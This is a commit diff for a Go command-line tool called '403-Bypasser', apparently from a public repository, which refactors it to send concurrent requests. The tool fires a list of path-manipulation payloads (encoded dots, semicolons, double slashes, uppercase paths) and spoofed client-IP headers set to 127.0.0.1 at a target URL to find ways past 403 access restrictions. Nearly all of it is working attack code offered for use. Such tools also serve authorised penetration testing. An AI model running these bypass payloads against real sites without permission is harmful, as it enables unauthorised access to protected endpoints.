commit
9c1edf9fc7
|
@ -0,0 +1,2 @@
|
||||||
|
fmt:
|
||||||
|
@gofmt -w -s main.go && goimports -w main.go && go vet main.go
|
196
main.go
196
main.go
|
@ -1,46 +1,21 @@
|
||||||
package main
|
package main
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"context"
|
||||||
"flag"
|
"flag"
|
||||||
"fmt"
|
"fmt"
|
||||||
"log"
|
"log"
|
||||||
"net/http"
|
"net/http"
|
||||||
"os"
|
"regexp"
|
||||||
|
"runtime"
|
||||||
"strings"
|
"strings"
|
||||||
|
"sync"
|
||||||
|
"time"
|
||||||
)
|
)
|
||||||
|
|
||||||
var Red = "\033[31m"
|
var (
|
||||||
var Green = "\033[32m"
|
reURL = regexp.MustCompile("^https?://")
|
||||||
var White = "\033[97m"
|
headerPayloads = []string{
|
||||||
|
|
||||||
func main() {
|
|
||||||
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
|
|
||||||
path := flag.String("path", "", "An endpoint. Example: admin")
|
|
||||||
flag.Parse()
|
|
||||||
|
|
||||||
if *domain == "" || *path == "" {
|
|
||||||
log.Fatalln("Using flag -url and -path")
|
|
||||||
os.Exit(0)
|
|
||||||
}
|
|
||||||
|
|
||||||
upperCase := strings.ToUpper(*path)
|
|
||||||
|
|
||||||
endpoint := []string{
|
|
||||||
*domain + "/" + upperCase,
|
|
||||||
*domain + "/" + *path + "/",
|
|
||||||
*domain + "/" + *path + "/.",
|
|
||||||
*domain + "//" + *path + "//",
|
|
||||||
*domain + "/./" + *path + "/./",
|
|
||||||
*domain + "/./" + *path + "/..",
|
|
||||||
*domain + "/;/" + *path,
|
|
||||||
*domain + "/.;/" + *path,
|
|
||||||
*domain + "//;//" + *path,
|
|
||||||
*domain + "/" + *path + "..;/",
|
|
||||||
*domain + "/%2e/" + *path,
|
|
||||||
*domain + "/%252e/" + *path,
|
|
||||||
*domain + "/%ef%bc%8f" + *path}
|
|
||||||
|
|
||||||
headers := []string{
|
|
||||||
"X-Custom-IP-Authorization",
|
"X-Custom-IP-Authorization",
|
||||||
"X-Originating-IP",
|
"X-Originating-IP",
|
||||||
"X-Forwarded-For",
|
"X-Forwarded-For",
|
||||||
|
@ -49,52 +24,127 @@ func main() {
|
||||||
"X-Host",
|
"X-Host",
|
||||||
"X-Forwarded-Host",
|
"X-Forwarded-Host",
|
||||||
"X-ProxyUser-Ip",
|
"X-ProxyUser-Ip",
|
||||||
"X-Remote-Addr"}
|
"X-Remote-Addr",
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
fmt.Println(Green, " _ _ ___ ____ ____ ")
|
const (
|
||||||
fmt.Println(Green, "| || | / _ \\___ \\ | _ \\ ")
|
version string = "v1.1.0"
|
||||||
fmt.Println(Green, "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __ ")
|
red string = "\033[31m"
|
||||||
fmt.Println(Green, "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__| ")
|
green string = "\033[32m"
|
||||||
fmt.Println(Green, " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ | ")
|
white string = "\033[97m"
|
||||||
fmt.Println(Green, " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_| ")
|
|
||||||
fmt.Println(Green, " __/ | | ")
|
|
||||||
fmt.Println(Green, " |___/|_| v1.0.2", White)
|
|
||||||
|
|
||||||
fmt.Println("\nDomain:", *domain)
|
headerValue string = "127.0.0.1"
|
||||||
fmt.Println("Path:", *path)
|
)
|
||||||
|
|
||||||
fmt.Println("\nNormal Request")
|
func showBanner() {
|
||||||
for i, str := range endpoint {
|
fmt.Printf("%s %s %s %s %s %s %s %s %s %s %s\n", green,
|
||||||
req, err := http.Get(str)
|
" _ _ ___ ____ ____\n",
|
||||||
if err != nil {
|
"| || | / _ \\___ \\ | _ \\\n",
|
||||||
log.Fatal(err)
|
"| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __\n",
|
||||||
}
|
"|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__|\n",
|
||||||
output := fmt.Sprintf("%s %d %s", str, req.StatusCode, http.StatusText(req.StatusCode))
|
" | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ |\n",
|
||||||
if req.StatusCode == 200 {
|
" |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_|\n",
|
||||||
fmt.Println(Green, i+1, output, White)
|
" __/ | |\n",
|
||||||
} else {
|
" |___/|_| ",
|
||||||
fmt.Println(Red, i+1, output, White)
|
version, white)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func getValidDomain(domain string) string {
|
||||||
|
trimmedDomain := strings.TrimSpace(domain)
|
||||||
|
|
||||||
|
if !reURL.MatchString(trimmedDomain) {
|
||||||
|
trimmedDomain = "https://" + trimmedDomain
|
||||||
}
|
}
|
||||||
|
|
||||||
fmt.Println("\nRequest with Headers")
|
return trimmedDomain
|
||||||
for j, head := range headers {
|
}
|
||||||
req2, err := http.NewRequest("GET", *domain+"/"+*path, nil)
|
|
||||||
if err != nil {
|
|
||||||
log.Fatal(err)
|
|
||||||
}
|
|
||||||
req2.Header.Set(head, "127.0.0.1")
|
|
||||||
resp, err := http.DefaultClient.Do(req2)
|
|
||||||
if err != nil {
|
|
||||||
log.Fatal(err)
|
|
||||||
}
|
|
||||||
output2 := fmt.Sprintf("%s %s %d %s", head, *domain+"/"+*path, resp.StatusCode, http.StatusText(resp.StatusCode))
|
|
||||||
|
|
||||||
if resp.StatusCode == 200 {
|
func constructEndpointPayloads(domain, path string) []string {
|
||||||
fmt.Println(Green, j+1, output2, White)
|
return []string{
|
||||||
} else {
|
domain + "/" + strings.ToUpper(path),
|
||||||
fmt.Println(Red, j+1, output2, White)
|
domain + "/" + path + "/",
|
||||||
}
|
domain + "/" + path + "/.",
|
||||||
|
domain + "//" + path + "//",
|
||||||
|
domain + "/./" + path + "/./",
|
||||||
|
domain + "/./" + path + "/..",
|
||||||
|
domain + "/;/" + path,
|
||||||
|
domain + "/.;/" + path,
|
||||||
|
domain + "//;//" + path,
|
||||||
|
domain + "/" + path + "..;/",
|
||||||
|
domain + "/%2e/" + path,
|
||||||
|
domain + "/%252e/" + path,
|
||||||
|
domain + "/%ef%bc%8f" + path,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func penetrateEndpoint(wg *sync.WaitGroup, url string, header ...string) {
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
defer wg.Done()
|
||||||
|
|
||||||
|
req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
|
||||||
|
if err != nil {
|
||||||
|
log.Fatal(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var h string
|
||||||
|
if header != nil {
|
||||||
|
h = header[0]
|
||||||
|
req.Header.Set(h, headerValue)
|
||||||
|
}
|
||||||
|
|
||||||
|
resp, err := http.DefaultClient.Do(req)
|
||||||
|
if err != nil {
|
||||||
|
log.Fatal(err)
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
color := green
|
||||||
|
if resp.StatusCode != 200 {
|
||||||
|
color = red
|
||||||
|
}
|
||||||
|
|
||||||
|
log.Println(color, h, url, resp.StatusCode, http.StatusText(resp.StatusCode), white)
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
runtime.GOMAXPROCS(1)
|
||||||
|
|
||||||
|
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
|
||||||
|
path := flag.String("path", "", "An endpoint. Example: admin")
|
||||||
|
flag.Parse()
|
||||||
|
|
||||||
|
if *domain == "" || *path == "" {
|
||||||
|
log.Fatalln("Using flag -url and -path")
|
||||||
|
}
|
||||||
|
|
||||||
|
validDomain := getValidDomain(*domain)
|
||||||
|
validPath := strings.TrimSpace(*path)
|
||||||
|
endpoints := constructEndpointPayloads(validDomain, validPath)
|
||||||
|
|
||||||
|
showBanner()
|
||||||
|
|
||||||
|
fmt.Println("\nDomain:", validDomain)
|
||||||
|
fmt.Println("Path:", validPath)
|
||||||
|
|
||||||
|
fmt.Println("\nNormal Request")
|
||||||
|
|
||||||
|
var wg sync.WaitGroup
|
||||||
|
wg.Add(len(endpoints))
|
||||||
|
|
||||||
|
for _, e := range endpoints {
|
||||||
|
go penetrateEndpoint(&wg, e)
|
||||||
|
}
|
||||||
|
|
||||||
|
wg.Wait()
|
||||||
|
|
||||||
|
fmt.Println("\nRequest with Headers")
|
||||||
|
wg.Add(len(headerPayloads))
|
||||||
|
|
||||||
|
for _, h := range headerPayloads {
|
||||||
|
go penetrateEndpoint(&wg, validDomain+"/"+validPath, h)
|
||||||
|
}
|
||||||
|
|
||||||
|
wg.Wait()
|
||||||
|
}
|
||||||
|
|
Loading…
Reference in New Issue